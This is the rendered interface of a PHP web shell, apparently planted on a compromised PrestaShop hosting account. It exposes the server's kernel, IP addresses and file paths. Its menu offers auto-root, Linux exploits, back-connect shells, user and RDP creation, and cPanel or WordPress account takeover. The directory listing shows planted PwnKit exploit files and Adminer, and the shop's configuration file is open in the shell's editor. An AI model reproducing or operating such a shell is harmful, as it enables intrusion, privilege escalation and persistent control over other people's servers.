Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
app /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
addons
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
config.yml
3.66
KB
-rw----r--
config_dev.yml
1.5
KB
-rw----r--
config_legacy.yml
590
B
-rw----r--
config_legacy_dev.yml
47
B
-rw----r--
config_legacy_prod.yml
163
B
-rw----r--
config_legacy_test.yml
47
B
-rw----r--
config_prod.yml
715
B
-rw----r--
config_test.yml
746
B
-rw----r--
doctrine.yml
719
B
-rw----r--
parameters.php
1012
B
-rw----r--
parameters.yml
11
B
-rw----r--
parameters.yml.dist
983
B
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
routing.yml
315
B
-rw----r--
routing_dev.yml
1.11
KB
-rw----r--
security.yml
631
B
-rw----r--
services.yml
258
B
-rw----r--
set_parameters.php
3.02
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.yml
imports: - { resource: set_parameters.php } - { resource: security.yml } - { resource: services.yml } - { resource: addons/*.yml } - { resource: doctrine.yml } # Put parameters here that don't need to change on each machine where the app is deployed # http://symfony.com/doc/current/best_practices/configuration.html#application-related-configuration parameters: env(PS_THEME_NAME): "classic" AdapterSecurityAdminClass: PrestaShop\PrestaShop\Adapter\Security\Admin translator.class: PrestaShopBundle\Translation\Translator translator.data_collector: PrestaShopBundle\Translation\DataCollectorTranslator admin_page: "%kernel.root_dir%/../src/PrestaShopBundle/Resources/views/Admin" env(PS_LOG_OUTPUT): "%kernel.logs_dir%/%kernel.environment%.log" mail_themes_uri: "/mails/themes" mail_themes_dir: "%kernel.project_dir%%mail_themes_uri%" # Autowires Core controllers services: PrestaShopBundle\Controller\: resource: "%kernel.root_dir%/../src/PrestaShopBundle/Controller/*" exclude: "%kernel.root_dir%/../src/PrestaShopBundle/Controller/Api" tags: - 'controller.service_arguments' - !php/const PrestaShopBundle\Controller\Admin\FrameworkBundleAdminController::PRESTASHOP_CORE_CONTROLLERS_TAG framework: assets: version: !php/const \AppKernel::VERSION #esi: ~ secret: "%secret%" translator: { fallbacks: ["default"] } router: resource: "%kernel.root_dir%/config/routing.yml" strict_requirements: ~ form: ~ csrf_protection: ~ validation: { enable_annotations: true } serializer: { enable_annotations: true } templating: engines: ['twig'] default_locale: "%locale%" trusted_hosts: ~ session: handler_id: ~ fragments: ~ http_method_override: true # Monolog configuration # monolog: handlers: main: type: stream path: '%env(PS_LOG_OUTPUT)%' level: notice legacy: type: service id: prestashop.handler.log level: warning channels: [app] # Twig Configuration twig: autoescape: "name" debug: "%kernel.debug%" strict_variables: "%kernel.debug%" form_themes: - 'PrestaShopBundle:Admin/TwigTemplateForm:bootstrap_4_horizontal_layout.html.twig' paths: '%admin_page%/Product': Product '%admin_page%/TwigTemplateForm': Twig '%admin_page%/Configure/AdvancedParameters': AdvancedParameters '%admin_page%/Configure/ShopParameters': ShopParameters '%kernel.root_dir%/../modules': Modules '%mail_themes_dir%': MailThemes globals: webpack_server: false # Swiftmailer Configuration swiftmailer: transport: "%mailer_transport%" host: "%mailer_host%" username: "%mailer_user%" password: "%mailer_password%" spool: { type: memory } # Guzzle configuration csa_guzzle: profiler: enabled: "%kernel.debug%" cache: enabled: true adapter: guzzle.cache clients: addons_api: config: # you can specify the options as in http://docs.guzzlephp.org/en/latest/quickstart.html#creating-a-client base_url: "https://api-addons.prestashop.com" defaults: timeout: "5.0" headers: Accept: "application/json" prestashop: addons: prestatrust: enabled: true api_client: ttl: 7200 # 2h # verify_ssl: ~ # Bundle CA by default, declaring "addons.api_client.verify_ssl" parameter overrides its usage
Close